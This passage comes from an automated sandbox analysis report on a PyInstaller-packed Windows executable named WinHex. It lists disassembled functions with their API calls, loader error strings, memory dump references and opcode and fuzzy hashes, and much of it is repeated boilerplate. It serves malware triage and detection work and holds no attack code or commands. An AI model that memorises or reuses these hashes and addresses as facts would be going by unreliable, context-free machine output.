                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                        • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                        • API String ID: 2238633743-1453502826
                                                                                                                        • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction ID: 6ca9727bcd8b4c374480aab79135fbb050de408e9abe94f3ba1df01c614855bb
                                                                                                                        • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                        • Instruction Fuzzy Hash: 44E19C69A0DB0390EA59EF18B950174EBA6EF14FF1BD45135C80D062A8EF7EF5988370
                                                                                                                        Function 00007FF7C5BD2030 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                        • String ID: P%
                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                        • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction ID: a1a463c519bf6108ca561f6adb72de4cd2895d7ea456adffcb9f70a6cd967f34
                                                                                                                        • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                        • Instruction Fuzzy Hash: 6351E626614BA186D638AF36E4181BAFBA1FB98B65F404121EBCF43684DF3DD045DB20
                                                                                                                        Function 00007FF7C5BD74B0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD74D7
                                                                                                                        • FormatMessageW.KERNEL32(00000000,00007FF7C5BD26A0), ref: 00007FF7C5BD7506
                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 00007FF7C5BD755C
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                        • API String ID: 2920928814-2573406579
                                                                                                                        • Opcode ID: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction ID: fe4a355ca845783776d585603199dbfe419796f75d79c0f8ab9cd272e8eeb1f4
                                                                                                                        • Opcode Fuzzy Hash: 8b0166d5a5045c769a8e77ad43af0852bc728ff9b5502801be361ecb61f6b2fa
                                                                                                                        • Instruction Fuzzy Hash: D7218335A1CA4282E724AF14E8413A6EB61FF58BA4FC40135D54D82698EF3EF145C760
                                                                                                                        Function 00007FF7C5BE0228 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                        • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction ID: b9f6ea7da8f048efc9a061a2ed25360ecab9b535426d5a4c0a98d7e36432f315
                                                                                                                        • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                        • Instruction Fuzzy Hash: 21128362E0C14BC6FB247F15E0547BAFAA1FB80B64FCC4135D699466C4DBBEE4818B60
                                                                                                                        Function 00007FF7C5BD12B0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                        • API String ID: 2030045667-3659356012
                                                                                                                        • Opcode ID: efd0891be10330c6936a4a3122e0582a69530ac68ce8ac451bd8ca1e0e6f8c8c
                                                                                                                        • Instruction ID: 0fc36d539ef71d072d827687d0b983611437a1b4b42d92eb5ddf835e803534bd
                                                                                                                        • Opcode Fuzzy Hash: efd0891be10330c6936a4a3122e0582a69530ac68ce8ac451bd8ca1e0e6f8c8c
                                                                                                                        • Instruction Fuzzy Hash: 59415F61B09A4281EA24FF15E4406BAEBA0EF44FB4FC44432DE4D47B59EE7EE542C720
                                                                                                                        Function 00007FF7C5BDDC30 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 849930591-393685449
                                                                                                                        • Opcode ID: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction ID: 772815f43b8c0e4ccacaf03b884f6aaba6ae7c725493e9303bc5331e6fabdf53
                                                                                                                        • Opcode Fuzzy Hash: 64a04dea20eab758f09741b49381e36ae6aa3d4dbdf263ead872da10faeebcc4
                                                                                                                        • Instruction Fuzzy Hash: 51E18272A08B418AEB20AF65D4413ADBFA0FB55FA8F900135EE8D47B59CF39E490C750
                                                                                                                        Function 00007FF7C5BEDDB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7C5BEE152,?,?,000001F51FAB5AA8,00007FF7C5BEA223,?,?,?,00007FF7C5BEA11A,?,?,?,00007FF7C5BE5472), ref: 00007FF7C5BEDF34
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000,?,00007FF7C5BEE152,?,?,000001F51FAB5AA8,00007FF7C5BEA223,?,?,?,00007FF7C5BEA11A,?,?,?,00007FF7C5BE5472), ref: 00007FF7C5BEDF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                        • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction ID: bb4caca448e70f6f84f032567f965fdf20afa7a70296d8f1595b4534dab20310
                                                                                                                        • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction Fuzzy Hash: 98411422B19A1285FE25EF169804575AB92BF54FB0FCD4239DD0D47788EEBEE405C360
                                                                                                                        Function 00007FF7C5BD7600 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD769F
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD76EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 626452242-27947307
                                                                                                                        • Opcode ID: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                                                                                        • Instruction ID: 8cf394125dec4e40598ad1a164190ae0acf85ea505d5433b523910bf6242399a
                                                                                                                        • Opcode Fuzzy Hash: ff563fd808d69f35f83569dbbc19b7f1e21c5d08308d418d8919d0e7ff1619ab
                                                                                                                        • Instruction Fuzzy Hash: 50418536A0CB8282D660EF15F4402A9FBA5FB84FA0F984535DA8D47B99DF7DE051C710
                                                                                                                        Function 00007FF7C5BD7B40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD7B81
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7C5BD7744,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BD101D), ref: 00007FF7C5BD2654
                                                                                                                          • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD7BF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                        • API String ID: 3723044601-27947307
                                                                                                                        • Opcode ID: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction ID: 0d1de49d71f8312abd5e5508090ed9daf69bdab55d6f7fb899235178049c6c9c
                                                                                                                        • Opcode Fuzzy Hash: aced5f46d53ba3e30c592e5434d0d7ab1f54160dd14b943fd141642a19c75b6b
                                                                                                                        • Instruction Fuzzy Hash: DB219C35A1CB8285EA10AF26E8401B9FB61EB94FA0F984235CA0D43799EF7EF5418310
                                                                                                                        Function 00007FF7C5BE9264 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: f$p$p
                                                                                                                        • API String ID: 3215553584-1995029353
                                                                                                                        • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction ID: d55eae33ffba98e0fee3df56c2bc23f63a9fb507286cb4b1583fe8c0ea6392d0
                                                                                                                        • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                        • Instruction Fuzzy Hash: 96129365E0C94386FB24BF15D0542B9FAA1FB81F64FCC4136D689476C4DBBEE5888B20
                                                                                                                        Function 00007FF7C5BD7C30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 98COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 626452242-876015163
                                                                                                                        • Opcode ID: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                                                                                        • Instruction ID: 6731b6c7fa2bc40efc690b105d238bc7e9297c103b5c6d6837a093fd47474ed5
                                                                                                                        • Opcode Fuzzy Hash: 290b57ca8453ae885af3ff2fc0035437ec55c1325ab119fe22c2f927501d8716
                                                                                                                        • Instruction Fuzzy Hash: E541B672A0CB4282E610EF15A4412B9EBA5FB84FA0F944135DF4D47BA8DF3DE456C710
                                                                                                                        Function 00007FF7C5BDCEE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCF6D
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCF7B
                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFA5
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFEB
                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7C5BDD19A,?,?,?,00007FF7C5BDCE8C,?,?,00000001,00007FF7C5BDCAA9), ref: 00007FF7C5BDCFF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 2559590344-2084034818
                                                                                                                        • Opcode ID: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction ID: c563875ac9a13bcc3fe2b64dffd0a963335b08f6d3aa18ddfb04f5baaed12451
                                                                                                                        • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction Fuzzy Hash: AA31F021A0AA4291EE15AF06A8105B4EBD4FF58FB0FD94634DD1D4A388EF3DF4498720
                                                                                                                        Function 00007FF7C5BD6480 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7C5BD7A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7C5BD7A6A
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7C5BD67CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7C5BD64DF
                                                                                                                          • Part of subcall function 00007FF7C5BD2770: MessageBoxW.USER32 ref: 00007FF7C5BD2841
                                                                                                                        Strings
                                                                                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7C5BD64B6
                                                                                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7C5BD653A
                                                                                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7C5BD64F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
